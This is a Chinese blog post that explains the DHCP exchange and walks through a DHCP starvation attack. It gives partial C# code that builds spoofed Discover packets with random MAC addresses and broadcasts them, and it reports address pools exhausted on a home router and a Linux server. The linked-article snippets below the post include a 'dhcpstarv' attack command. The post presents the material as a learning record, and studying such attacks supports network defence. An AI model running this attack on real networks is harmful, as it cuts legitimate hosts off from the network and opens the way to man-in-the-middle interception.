DHCP协议原理分析与饥饿攻击的实现

原创 已于 2025-08-22 19:45:37 修改 · 1.9k 阅读 · 12 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络 #路由器 #dhcp #网络通信 #c#

于 2021-06-24 16:28:42 首次发布

DHCP协议原理分析与饥饿攻击的实现

有以下基础的同学’食用’效果最佳

  • 网络基础知识
  • 开发基础知识
    本文章仅做学习记录和交流,不提供任何成品

实验过程用到的工具

  • WinPcap 用于二层网络发包
  • SharpPcap C#调用WinPcap的开源nuget包
  • Visual Studio 开发工具
  • WireShark 抓包工具
  • Linux服务器 充当傀儡机(DHCP服务器)

DHCP协议介绍

DHCP(动态主机配置协议)是一个局域网的网络协议。指的是由服务器控制一段IP地址范围,客户机登录服务器时就可以自动获得服务器分配的IP地址和子网掩码。

DHCP交互过程

交互过程图

  1. DHCP客户端向DHCP服务器请求分配ip地址时会发送discover广播报文

  2. DHCP服务器收到discover请求报文后,响应携带空闲IP、租约时间、网关、DHCP服务器IP等信息的offer报文。根据discover报文内的Bootp flags标识选择广播或单播响应

  3. DHCP客户端收到DHCP服务端offer报文后根据报文内携带的空闲IP发起request报文请求

  4. DHCP服务端收到DHCP客户端的request报文后,正常情况下会响应ack报文,将该空闲IP分配给DHCP客户端

    百度百科解析

DHCP报文格式

DHCP报文格式
报文各字段描述篇幅过长,这里不再赘述,详见:
百度百科 DHCP报文格式介绍

DHCP饥饿攻击

攻击原理:攻击者通过伪造MAC地址持续大量地向DHCP服务器申请IP地址,直到耗尽DHCP服务器地址池的IP地址,使DHCP服务器无法再给正常的主机分配IP地址,使得正常主机不能访问网络。
进阶攻击:攻击者可以伪造DHCP服务器分配ip地址给客户机,实现中间人攻击(可以通过DHCP Snooping防御)

DHCP攻击思路

攻击交互过程
  1. 伪造MAC、主机名,构建发送DHCP_Discover攻击报文
  2. 根据DHCP服务器响应的DHCP_Offer报文取得预分配的IP地址(DHCP数据报文的yiaddr字段)和DHCP服务器IP地址[Option: (54) DHCP Server Identifier)]
  3. 取DHCP_Offer报文的yiaddr字段的IP地址和DHCP服务器IP地址,构建发送DHCP_Request攻击报文
  4. DHCP服务器响应DHCP_Ack,成功分配IP(非法占用IP)
攻击报文生成过程

TCP/IP四层结构模型数据生成

  1. 生成应用层数据–>DHCP数据包(DATA)
  2. 生成传输层数据–>UDP数据包(PORT)
  3. 生成网络层数据–>IP数据包(IP)
  4. 生成接口层数据–>物理层数据包(MAC)
数据封装过程

封装过程图示

编码实战

由于篇幅有限,故不展示全部具体实现方法,只摘取关键代码。部分内容使用伪代码展示

		/// 构建DHCP_Discover数据报文
        /// </summary>
        /// <param name="xid">DHCP事务id</param>
        /// <param name="V_address">请求分配ip的Mac地址(伪造)</param>
        /// <param name="hostname">主机名</param>
        /// <returns>DHCP_Discover数据报文字节数组</returns>
        private byte[] DHCP_Discover_Packet(byte[] xid, PhysicalAddress V_address, string hostname)
        {
            byte[] data = new byte[]{
            0x01, 0x01, 0x06, 0x00,//客户端发送给DHCP服务器
            0x30, 0x7b, 0x44, 0xb6,//事务ID。客户端发起一次请求时选择的随机数,用来标识一次地址请求过程
            0x00, 0x00, 0x80, 0x00,//secs & flags,flags 08 00 让dhcp广播回复
            0x00, 0x00, 0x00, 0x00,//ciaddr
            0x00, 0x00, 0x00, 0x00,//yiaddr
            0x00, 0x00, 0x00, 0x00,//siaddr
            0x00, 0x00, 0x00, 0x00,//giaddr
            0x6a, 0xdd, 0x07, 0xcf, 0x50, 0x42,//chaddr的MAC
            //为方便阅读,省略部分过长报文
            0x63, 0x82, 0x53, 0x63,//Magic cookie: DHCP
            0x35, 0x01, 0x01,//Option: (53) DHCP Message Type (Discover)
            0x3d, 0x07, 0x01,//Option: (61) Client identifier,Length: 7,Hardware type: Ethernet (0x01)
            0x6a, 0xdd, 0x07, 0xcf, 0x50, 0x42,//Option: (61) Client identifier,MAC地址
            0x0c,//Option: (12) Host Name
            0x0f,//Option: (12) Host Name,下面主机名的长度,Length
            0x44, 0x45, 0x53, 0x4b, 0x54, 0x4f, 0x50, 0x2d, 0x46, 0x43, 0x35, 0x41, 0x32, 0x39, 0x42,//Option: (12) Host Name,主机名
            0x3c, 0x08, 0x4d, 0x53, 0x46, 0x54, 0x20, 0x35, 0x2e, 0x30,//Option: (60) Vendor class identifier
            0x37, 0x0e, 0x01, 0x03, 0x06, 0x0f, 0x1f, 0x21, 0x2b, 0x2c, 0x2e, 0x2f, 0x77, 0x79, 0xf9, 0xfc,//Option: (55) Parameter Request List
            0xff,//Option: (255) End
            };
            
            写入事务ID
            写入MAC
            写入hostname
			return data;
       }

 		/// <summary>
        /// 生成DHCP二层通讯报文
        /// </summary>
        /// <param name="address">物理网卡地址</param>
        /// <param name="baseData">DHCP报文数据</param>
        /// <returns>返回DHCP二层通讯报文</returns>
        public EthernetPacket Create_Packet(PhysicalAddress address, byte[] baseData, ushort IP_Identification)
        {
            //构建UDP报文,DHCP使用UDP协议67和68端口
            UdpPacket udpData = UDP_Packet(68, 67, baseData);

            //构建IP报文。发送广播请求IP地址
            IPPacket ipData = IP_Packet(IPAddress.Parse("0.0.0.0"), IPAddress.Parse("255.255.255.255"), IP_Identification, udpData);

            //构建二层报文,二层广播报文目的MAC地址为6个FF
            EthernetPacket ethData = Eth_Packet(address, new PhysicalAddress(new byte[] { 0xff, 0xff, 0xff, 0xff, 0xff, 0xff }), ipData);

            return ethData;
        }

 		/// <summary>
        /// 发送攻击数据报
        /// </summary>
        private void Send_Attack_Packet()
        {
            ConstructingPackets constructingPackets = new ConstructingPackets();

            byte[] xid = Get_Random_Xid();//随机事务id
            PhysicalAddress v_mac = new PhysicalAddress(Get_Random_MAC());//虚拟mac地址
            string hostname = Get_Random_Hostname();//虚拟主机名

            EthernetPacket data = constructingPackets.Create_DHCP_Discover(device.MacAddress, xid, v_mac, hostname, IP_Identification);//构建数据包

            device.SendPacket(data.Bytes);//发包
           
            Console.WriteLine("发包成功 DHCP_Discover --> xid = {0} , mac = {1} , hostname = {2} ", r_xid, v_mac, hostname);
            Console.WriteLine();

        }

攻击效果展示

通过程序批量发送10个请求discover和request报文,成功占用10个ip地址,图中取第一个报文做效果展示攻击效果
查看DHCP服务器的ip分配信息,可以看到地址池的ip已经被占用。
DHCP服务器分配信息

结论

实验过程中攻击家用路由器、linux搭建的DHCP服务器均有效。由于DHCP服务器的IP地址池被非法攻击占满后,新增的设备发送dhcp_discover请求,DHCP服务器不再响应任何报文。

文中如有错误欢迎指正

15、网络安全:Cisco协议漏洞DoS/DDoS攻击解析
ik678901的博客
07-17 28
本文详细解析了网络安全中Cisco协议相关的漏洞问题,包括VTP协议的信息泄露和链路聚合协议(PAgP/LACP)的安全隐患,同时深入探讨了DoS和DDoS攻击原理、类型及缓解措施。文章还介绍了网络安全威胁的应对策略,提出了构建多层次防护体系和加强网络安全意识的重要性,并展望了未来网络安全的发展趋势,为保障网络环境的安全提供了全面的指导方案。
16、网络安全:Cisco IOS IPSLayer 2攻击防范
最新发布
h6i7j8的博客
07-18 14
本博客深入探讨了Cisco IOS IPS的配置Layer 2常见攻击类型的缓解方法。内容涵盖入侵检测系统的关键概念、Layer 2攻击如CAM表溢出、VLAN跳跃、STP操纵、MAC欺骗等的原理及防御策略,并结合小型、大型企业和数据中心网络的不同需求,提出了综合性的安全策略。同时,博客还强调了网络安全的持续优化方法,包括定期评估、策略更新、员工培训和应急响应计划,为构建多层次的网络安全防护体系提供了全面指导。
DHCP原理DHCP服务器的防攻击手段
热门推荐
feipeng45的博客
10-16 1万+
一、DHCP简介 1、产生背景:网络增大,手工配置存在很多问题【人员素质要求高、容易出错、灵活性差、IP地址资源利用率低、工作量大,不利于管理等】 2、DHCP相对于静态手工配置的优点【效率高、灵活性强、易于管理等】 二、DHCP原理配置 (一)、DHCP的基本工作过程【发现阶段、提供阶段、请求阶段、确认阶段】如下图: 【发现阶段】:在发现阶段,DHCP客户端会以广播的方式给自己所在在广播域...
DHCP饿死攻击
purvispanwu的博客
04-10 5167
原理 如果需要进行DHCP饿死攻击,必须不断发送伪造不同的chaddr地址的dhcp discover消息来获取地址 漏洞分析 DHCP服务器向申请者分配IP地址时,无法区分正常的申请者恶意的申请者 实现工具 kaili: Dhcpstarv工具 攻击命令 dhcpstarv -i [interface-name] 例子:dhcpstarv -i eth0 防御方式 dhcp snooping 开启dhcp snooping监听dhcp recover报文 [Huawei]dhcp
DHCP协议的工作过程,DHCP攻击原理和防御方法:
weixin_44809632的博客
08-23 2450
一 .DHCP协议工作的四个过程: 1.注意: DHCP在提供服务时,DHCP客户端是以UDP 68号端口进行数据传输的,而DHCP服务器是以UDP 67号端口进行数据传输的。 2. 3. 发现阶段(DHCP客户端在网络中广播发送DHCP DISCOVER请求报文,发现DHCP服务器,请求IP地址租约) 提供阶段(DHCP服务器通过DHCP OFFER报文向DHCP客户端提供IP地址预分配) 选择阶段(DHCP客户端通过DHCP REQUEST报文确认选择第一个DHCP服务器为它提供IP地址自动分配服务)
DHCP攻击原理及防护
kuaizai__的博客
03-03 2722
DHCP攻击dhcp这个协议而言,共存在4中包 discover office requrst ack 但是由于没有确认机制,就透出了安全漏洞。 安全漏洞: 1.
防止DHCP饥饿攻击
weixin_42135997的博客
09-06 5583
DHCP饥饿攻击,伪造合法的MAC地址,不断地向DHCP服务器发出DHCP Request包,最后耗尽服务器的可用IP,于是原有的这台DHCP服务器便不能够给客户端分配IP了,此时不法分子再伪造一台DHCP服务器,给客户端分配IP,将客户端的默认网关和DNS都设置成自己的机器,于是便可以对客户端进行中间人攻击。 预防方法:在交换机上通过传统的DHCPSnooping技术就可以来防范DHCP假冒攻...
DHCP-Powner:DHCP 饥饿漏洞利用
06-24
4. **影响后果**:成功执行DHCP饥饿攻击后,正常用户将无法从服务器获取必要的网络配置,导致他们无法连接到网络。此外,攻击者可能还能通过这种方式控制网络流量,甚至进行中间人攻击或其他恶意活动。 5. **防御...
DHCP中的安全感知威胁响应
### 1.1 DHCP协议概述 动态主机配置协议(Dynamic Host Configuration Protocol,简称DHCP)是一种局域网技术,用于为客户端分配网络配置信息。DHCP协议通过服务器自动分配IP地址、子网掩码、网关、DNS等参数,使...
DHCP饿死攻击及防御(基于ENSP模拟器、Kali攻击实现)
tigerman20201的博客
01-29 2989
1.DHCP饿死攻击及防御(基于ENSP模拟器、Kali攻击实现)
dhcp地址池攻击
12-30
使用bt5的yersinia攻击windows server 2003搭建的dhcp服务器
局域网攻击DHCP Starvation(DHCP饿死
YYYYU_ZHIZZZ的博客
05-29 4950
DHCP泛洪攻击
DHCP地址池攻击实验
在下小黄的博客
12-25 1602
大家好! 我是小黄,很高兴又跟大家见面啦 ! 今天更新的是: DHCP地址池攻击实验。 往期检索:程序设计学习笔记——目录 创建时间:2020年12月25日 软件: eNsp_Client 、SecureCRT 先放一张思维导图,大致知道操作系统的具体功能和目标,然后再一一展开叙述。 DHCP地址池攻击实验:1. eNSP创建环境 :1.1 配置路由器:1.2 Cloud:2. Kail环境配置:3. DHCP攻击实验过程:3.1在SecureCRT中配置交换机和路由器:3.1.1 配置路
DHCP服务器攻击详细步骤
Zeker62的博客
08-04 3069
攻击内容 本次攻击分为两个步骤: 攻击DHCP服务器,消耗地址池中的IP地址,让新来的主机不能获得IP。 伪装成DHCP服务器,采用中间人攻击,获取各种数据包。 攻击DHCP服务器:消耗地址池 建议在做攻击的时候使用两块网卡,一块可以正常上网,一块用作这一网络内的内部网卡, kali工具 dhcpstarv 使用 dhcpstarv -v -i eth1 (我在这一网络下的网卡就是eht1) 建议使用-v将攻击过程放到前台观看. 我们转到服务器上去看看,发现我们已经将地址池消耗的差不多了
DHCP攻击及防御
qq_43518594的博客
10-15 1万+
DHCP攻击 原理DHCP攻击针对的目标是网络中的DHCP服务器,原理是耗尽DHCP服务器所有的IP地址资源,使其无法正常提供地址分配服务。然后在网络中再架设假冒的DHCP服务器为客户端分发IP地址,从而来实现中间人攻击DHCP工作过程: 工作过程分为四个阶段 发现阶段:首先客户端广播发送DHCP Discover报文来寻找DHCP服务器。 提供阶段:DHCP服务器接收到DHCP Discover报文后,查看自己的地址池中是否有可用地址,如果有,会在这个IP上做一个标记,并用DHCP Offer报
如何防止DHCP饿死攻击
weixin_73894750的博客
12-07 535
配置了dhcp中继模式,防止了dhcp饿死攻击
DHCP欺骗原理欺骗攻击
weixin_44991806的博客
05-13 3351
DHCP的工作原理 DHCP(动态主机配置协议)是一个局域网的网络协议。使用UDP协议工作,常用端口67(DHCP server服务端)68(DHCP client客户端),由服务器控制一段IP地址范围,客户机登录服务器时就可以自动获得服务器分配的IP地址和子网掩码。默认情况下,DHCP作为Windows Server的一个服务组件不会被系统自动安装,需要管理员手动安装并进行必要的配置。 2 .写出DHCP欺骗的原理 1、清空DHCP服务器地址池 2、攻击机搭建一个DHCP服务器 3、目标...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值